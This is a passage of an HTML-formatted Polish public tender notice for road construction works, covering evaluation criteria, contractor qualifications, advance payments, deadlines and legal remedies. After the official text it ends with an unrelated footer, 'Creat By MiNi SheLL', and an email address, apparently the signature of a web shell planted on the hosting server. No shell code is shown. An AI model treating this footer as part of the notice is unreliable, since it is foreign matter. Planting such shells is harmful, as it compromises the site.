dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie odpowiadać wymaganiom<br/>zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną w oparciu o kryteria oceny ofert określone w rozdziale<br/>XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>- zdolności technicznej lub zawodowej:<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5<br/>lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę budowlaną (lub więcej robót) obejmującą swoim zakresem budowę/przebudowę/rozbudowę drogi na kwotę:<br/>a) nie mniej niż 300 000,00 zł w przypadku złożenia oferty na I część przedmiotu zamówienia<br/>b) nie mniej niż 200 000,00 zł w przypadku złożenia oferty na II część przedmiotu zamówienia.<br/>W sytuacji, złożenia ofert na więcej niż jedną część przedmiotu zamówienia Wykonawca musi wykazać wykonanie robót budowlanych równych sumie kwot wskazanych wyżej – w zależności od liczby złożonych ofert częściowych.<br/>W sytuacji złożenia oferty wspólnej Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykażą łącznie wykonanie robót budowlanych na kwoty wyżej wskazane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>składania podmiotowych środków dowodowych na potwierdzenie<br/>niepodlegania wykluczeniu. Zamawiający wymaga jedynie złożenia oświadczenia, o którym mowa w<br/>art. 125 ust. 1 ustawy. (zał. 2 do SWZ) oraz złożenia oświadczenia, o którym mowa w art. 7 ust. 1 i 5 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r.,<br/>poz. 835 ze zm.) – załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wraz z ofertą wykonawca zobowiązany jest złożyć oświadczenia stanowiące wstępne potwierdzenie, że wykonawca na dzień składania<br/>ofert nie podlega wykluczeniu oraz spełnia warunki udziału w postepowaniu. Ponadto Zamawiający wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących<br/>podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca zobowiązany będzie złożyć :<br/>a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich<br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 6<br/>do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę składa się na Formularzu Ofertowym zgodnie z Załącznikiem nr 1 do SWZ. (zał. 1a dot. części I przedmiotu zamówienia, zał. 1b dot. części II przedmiotu zamówienia)<br/>2. Do oferty należy załączyć odpowiednie oświadczenia/dokumenty, o których mowa w<br/>Rozdziale X SWZ.<br/>3. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania W(ykonawcy<br/>(Wykonawców wspólnie ubiegających się o udzielenie zamówienia) Jeżeli upoważnienie nie<br/>wynika<br/>z ogólnie dostępnych danych rejestrowych (wpis KRS, CEIDG) do oferty należy załączyć<br/>dokument potwierdzający umocowanie danej osoby/osób do podpisania oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia<br/>o których mowa w Rozdziale X SWZ, składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Rozliczenie z Wykonawcą nastąpi zgodnie z zapisami promesy wstępnej uzyskanej <br/>w ramach Rządowego Funduszu Polski Ład Program Inwestycji Strategicznych- II edycja tj. Zamawiający udzieli Wykonawcy/Wykonawcom zaliczki na wykonanie przedmiotu zamówienia w wysokości 5% należnego wynagrodzenia (tj. 2,5% dla części I przedmiotu zamówienia oraz 2,5% dla części II przedmiotu zamówienia) w terminie do 30 dni od daty podpisania umowy dla danej części zamówienia. Pozostała część Wynagrodzenia wypłacona zostanie po zakończeniu całości Inwestycji (tj. po zakończeniu części I i II przedmiotu zamówienia) i zatwierdzeniu przez Zamawiającego/ Inspektora nadzoru protokołu odbioru końcowego dla każdej z części przedmiotu zamówienia. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy zawarte są w projektach umów stanowiące Załącznik<br/>nr. 7 do SWZ, dla części I przedmiotu zamówienia oraz załącznik nr 8 dla części II przedmiotu zamówienia.<br/>2. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 7 i 8 do SWZ.<br/>3. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym w projekcie umowy, stanowiącym Załącznik nr 7 i 8 do SWZ.<br/>5. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">strona postępowania na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/wijewo/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Środki ochrony prawnej: 1. Wykonawcy przysługują przewidziane w ustawie Pzp środki ochrony<br/>prawnej. Szczegółowe zasady wnoszenia środków ochrony prawnej oraz postępowania<br/>toczonego wskutek ich wniesienia określa Dział IX ustawy Pzp.<br/>2. Odwołanie przysługuje na:<br/>a. niezgodną z przepisami ustawy czynność zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, o zawarcie<br/>umowy ramowej, dynamicznym systemie zakupów, systemie<br/>kwalifikowania wykonawców lub konkursie, w tym na projektowane postanowienie umowy;<br/>b. zaniechanie czynności w postępowaniu o udzielenie zamówienia, o zawarcie umowy ramowej,<br/>dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie, do której<br/>zamawiający był obowiązany na podstawie ustawy;<br/>c. zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lub zorganizowania<br/>konkursu na podstawie ustawy, mimo że zamawiający był do tego obowiązany.<br/>3. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie<br/>zamówienia oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę,<br/>o której mowa w art. 469 pkt 15 ustawy Pzp, oraz Rzecznikowi Małych i Średnich<br/>Przedsiębiorców.<br/>4. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy<br/>Pzp, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu (na<br/>zasadach określonych w art. 579-590 ustawy Pzp). Pozasądowe rozwiązywanie sporów:<br/>1. Pozasądowe rozwiązanie sporu w drodze ugody jest dopuszczalne, gdy każda ze stron<br/>umowy, w przypadku sporu wynikającego z zamówienia, złoży wniosek o przeprowadzenie<br/>mediacji lub inne polubowne rozwiązanie sporu do Sądu Polubownego przy Prokuratorii<br/>Generalnej Rzeczypospolitej Polskiej, wybranego mediatora albo osoby prowadzącej inne<br/>polubowne rozwiązanie sporu- zgodnie z art. 591 ustawy Pzp.<br/>2. Umowa lub umowa ramowa może zawierać postanowienia o mediacji lub innym polubownym<br/>rozwiązaniu sporu. Umowa o mediację lub inne polubowne rozwiązanie sporu może być zawarta<br/>także przez wyrażenie przez stronę zgody na mediację lub inne polubowne rozwiązanie sporu,<br/>gdy druga strona złożyła wniosek, o którym mowa w ust. 1. (art. 592 ustawy Pzp).<br/>3. Zawarcie ugody nie może prowadzić do naruszenia przepisów działu VII rozdziału 3 ustawy<br/>Pzp.<br/>4. W przypadku odmowy przeprowadzenia mediacji lub innego polubownego rozwiązania sporu<br/>przez Sąd Polubowny przy Prokuratorii Generalnej Rzeczypospolitej Polskiej, sąd kieruje strony<br/>do mediacji lub innego polubownego rozwiązania sporu przy pomocy mediatora albo osoby<br/>prowadzącej inne polubowne rozwiązanie sporu zgodnie z wyborem stron.<br/>5. W razie braku wyboru mediatora albo innej osoby prowadzącej inne polubowne rozwiązanie<br/>sporu sąd wyznaczy osobę mediatora zgodnie z art. 183 ustawy z dnia 17 listopada 1964 r. -<br/>Kodeks postępowania cywilnego (Dz.U.2021.1129 t.j. z dnia 2021.06.24) lub osobę mającą<br/>odpowiednią wiedzę i umiejętności w zakresie prowadzenia innego polubownego rozwiązania<br/>sporu w sprawach cywilnych i zamówień.

Creat By MiNi SheLL
Email: jattceo@gmail.com